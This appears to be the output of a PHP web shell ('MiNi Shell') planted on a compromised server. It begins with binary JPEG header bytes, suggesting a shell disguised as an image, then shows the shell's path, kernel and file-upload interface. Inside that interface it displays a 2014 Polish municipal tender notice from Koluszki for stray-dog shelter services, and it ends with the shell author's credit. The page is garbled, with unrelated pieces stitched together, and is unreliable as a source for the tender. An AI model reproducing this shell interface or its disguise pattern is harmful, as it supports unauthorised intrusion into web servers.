JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140701/141395-N-2014.html

<p class="kh_header"><b>Koluszki: Sukcesywne  przyjęcie do schroniska bezpańskich psów z terenu Gminy Koluszki oraz zapewnienie im  właściwych warunków pobytu</b><br>
<b>Numer ogłoszenia: 141395 - 2014; data zamieszczenia: 01.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Koluszkach , ul. 11-go Listopada 65, 95-040 Koluszki, woj. łódzkie, tel. 044 7256700, faks 044 7145840.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.koluszki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne  przyjęcie do schroniska bezpańskich psów z terenu Gminy Koluszki oraz zapewnienie im  właściwych warunków pobytu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem niniejszego zamówienia jest:
a) przybycie  na wskazane  miejsce na  terenie Gminy  Koluszki, gdzie znajdują  się  już  odłowione, bezpańskie  psy  i  ich zabranie  do schroniska  dla zwierząt. Przyjmuje się, że liczba  odłowionych  bezpańskich  psów do zabrania w  całym okresie obowiązywania  umowy  będzie  wynosiła  nie  więcej  niż  80 sztuk. 
Zamawiający zastrzega sobie, że  ilość  psów do  przyjęcia do schroniska  może  być mniejsza, 
a wynikać  to będzie z aktualnej  ilości  bezpańskich   psów  odłowionych  z  terenu  Gminy  Koluszki.  
Przyjazd  i zabranie  bezpańskiego  psa  oraz  przyjęcie  do  schroniska  powinno  nastąpić  w terminie  nie  dłuższym   niż 10 dni  od  daty zgłoszenia przez Zamawiającego  przyjazdu  przez Wykonawcę. Przyjmuje się, że Wykonawca  będzie zobowiązany  przez  Zamawiającego do  przyjazdu, gdy  do odbioru  będzie minimum  3 -5  psów.  
b) transport  do schroniska  odłowionych  psów.  
c) zapewnienie  właściwych  warunków  pobytu  psów  w schronisku  tj. opiekę, wyżywienie,  nadzór  weterynaryjny, profilaktykę  w tym: kastrację i  sterylizację, aby  zapobiec dalszemu  rozmnażaniu  oraz lecznictwo.
d) czipowanie lub  oznaczanie przechowywanych  w schronisku  psów i  prowadzenie  ich  szczegółowej  ewidencji  z dokumentacją  fotograficzną, 
e) sporządzanie  i  przekazywanie Zamawiającemu  kwartalnych sprawozdań  
i  zestawień  psów  przebywających  w  schronisku  z  terenu  Gminy  Koluszki. 
f) prowadzenie  działań  adopcyjnych psów z terenu Gminy Koluszki  i zamieszczanie  zdjęć psów  przeznaczonych  do  adopcji  na  stronie internetowej  schroniska. 
2. Przewóz  psów  powinien  odbywać się za pomocą: środków, narzędzi 
i  pojazdów przystosowanych  do odławiania  i  transportu  psów. Wszystkie  koszty  transportu  psów do schroniska,  oraz ich  pobytu  są  po  stronie Wykonawcy.
3.  Gmina  Koluszki  uiszcza  jednorazową  ryczałtową  opłatę  za  przyjęcie  i  pobyt psa w  schronisku..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.50.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na podstawie  podpisanych  oświadczeń: o  spełnieniu  warunków  udziału w  postępowaniu, o  których  mowa  w  art. 22 ust. 1 i  braku  podstaw  do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2  Ustawy  Prawo  Zamówień  Publicznych,  oraz  gdy  Wykonawca  załączy:  
a) aktualny  odpis  z  właściwego  rejestru  lub  Centralnej  Ewidencji  i  Informacji o Działalności Gospodarczej  Rzeczpospolitej Polskiej,  jeżeli odrębne przepisy wymagają  wpisu  do  rejestru lub  ewidencji   wystawionego  nie  wcześniej  niż 6 miesięcy  przed upływem  terminu  składania  ofert.
b) zezwolenie  na prowadzenie schroniska dla  bezdomnych zwierząt, wydane decyzją Powiatowego  Lekarza Weterynarii  o nadaniu  weterynaryjnego numeru identyfikacyjnego.
 Ocena  spełnienia  warunków  będzie  dokonywana  na  podstawie złożonych dokumentów  
i  oświadczeń  na  zasadzie :  spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna  ten  warunek  za  spełniony  na  podstawie  podpisanego  oświadczenie  
o  spełnieniu  warunków udziału w  postępowaniu, o  których mowa  w  art. 22 ust. 1  Ustawy  Prawo  Zamówień  Publicznych.
 Ocena  spełnienia  warunków  będzie  dokonywana  na  podstawie złożonych dokumentów 
 i  oświadczeń  na  zasadzie :  spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna  ten  warunek  za  spełniony  na  podstawie  podpisanego  oświadczenie  o  spełnieniu  warunków udziału w  postępowaniu, o  których mowa  w  art. 22 ust. 1  Ustawy  Prawo  Zamówień  Publicznych.
 Ocena  spełnienia  warunków  będzie  dokonywana  na  podstawie złożonych dokumentów  i  oświadczeń  na  zasadzie :  spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna  ten  warunek  za  spełniony  na  podstawie  podpisanego  oświadczenie  o  spełnieniu  warunków udziału w  postępowaniu, o  których mowa  w  art. 22 ust. 1  Ustawy  Prawo  Zamówień  Publicznych.
 Ocena  spełnienia  warunków  będzie  dokonywana  na  podstawie złożonych dokumentów  i  oświadczeń  na  zasadzie :  spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna  ten  warunek  za  spełniony na podstawie podpisanego oświadczenie  
o  spełnieniu  warunków udziału w  postępowaniu, o  których mowa  w  art. 22 ust. 1 Ustawy  Prawo  Zamówień  Publicznych.
 Ocena  spełnienia  warunków  będzie  dokonywana  na  podstawie złożonych dokumentów  i  oświadczeń  na  zasadzie :  spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)  Wypełniony   formularz   ofertowy
2)  Zezwolenie  na prowadzenie schroniska dla  bezdomnych zwierząt, wydane decyzją Powiatowego Lekarza Weterynarii  o nadaniu weterynaryjnego numeru identyfikacyjnego.
3) W  przypadku, gdy podmioty  występują  wspólnie  Wykonawcy  powinni  ustanowić  pełnomocnika  do  reprezentowania  ich w  postępowaniu  o udzielenie zamówienia,  albo  reprezentowania  w  postępowaniu  
i  zawarcia  umowy w  sprawie  zamówienia  publicznego.  Pełnomocnictwo   powinno  być  w formie oryginału  
lub  kopii  poświadczonej przez  notariusza.
4) W  przypadku, gdy Wykonawca będzie polegał  na wiedzy  i doświadczeniu, potencjale technicznym, osób  zdolnych do wykonania zamówienia lub zdolnościach  finansowych innych  podmiotów, zobowiązany  jest udowodnić zamawiającemu  iż  będzie dysponował  zasobami  niezbędnymi do realizacji zamówienia,  
w  szczególności  przedstawiając w tym celu  pisemne  zobowiązanie  tych podmiotów  do oddania  mu do dyspozycji  niezbędnych  zasobów  na  okres  korzystania  z  nich   przy wykonywaniu  zamówienia.   
W   przypadku,   gdy  Wykonawca   polega  na  zasobach  innych  podmiotów,  musi  wykazać  Zamawiającemu,  że  stosunek  łączący  wykonawcę  z  tymi  podmiotami  gwarantuje  rzeczywisty  dostęp do  ich zasobów.
Na  potwierdzenie  powinien załączyć dokument  określający sposób wykorzystania  zasobów innego podmiotu  przez  Wykonawcę  przy  wykonywaniu  zamówienia  oraz  charakter  stosunków  jaki będzie  łączył  wykonawcę  z  innym  podmiotem</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) Zamawiający  dopuszcza  zmianę  postanowień zawartej umowy w stosunku do treści  oferty,  na  podstawie której  dokonano  wyboru  wykonawcy  w następujących przypadkach:
a) w  uzasadnionych   przypadkach,  gdy zajdzie  konieczność  zmiany   terminu  realizacji  zamówienia,  Zamawiający  na  pisemny  wniosek  Wykonawcy  może wydłużyć  termin  realizacji  tego  zamówienia  o  niezbędny  okres  na  realizację świadczonych  usług,
b) w  innych  uzasadnionych  przypadkach,  gdy  zajdzie  konieczność wprowadzenia  do  umowy  koniecznych  zmian  wynikających  z okoliczności,  których  nie  można  było przewidzieć  w  chwili  zawarcia  umowy  a  w szczególności   zmiany  sposobu  wykonania  usługi,  Zamawiający  za  zgodą  lub  na  wniosek  Wykonawcy  może  dokonać  takiej zmiany, 
c) w  przypadku, gdy  zmiany  postanowień  zawartej  umowy będą korzystne dla Zamawiającego, a  zmiany  te wynikły  w  trakcie realizacji zamówienia, Zamawiający  za zgodą  Wykonawcy  może dokonać  takiej zmiany,
d) w  przypadku, gdy zajdzie  uzasadniona  konieczność  ograniczenia,  lub  rezygnacji z części  usług, Zamawiający  zastrzega  sobie, że zapłaci  Wykonawcy  tylko za  zlecone  i faktycznie  wykonane  usługi,
e) zmiany podmiotu  trzeciego  ( podwykonawcy  na etapie realizacji zamówienia),
a  nowy  podwykonawca  wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany na  etapie postępowania o zamówienie publiczne  dotychczasowy podwykonawca,
f) w przypadku  ustawowej  zmiany  stawki podatku  od  towarów i  usług  ( VAT) cena  netto  pozostanie  bez zmian, a kwota  podatku VAT i  wartość  brutto zostanie  odpowiednio  skorygowana  zgodnie  z  aktualnie  obowiązującymi przepisami  podatkowymi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.koluszki.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Koluszkach przy ul 11 Listopada 65  pok. 203.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.07.2014 godzina 09:30, miejsce: kancelaria Urzędu Miejskiego w Koluszkach przy ul. 11 Listopada 65.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com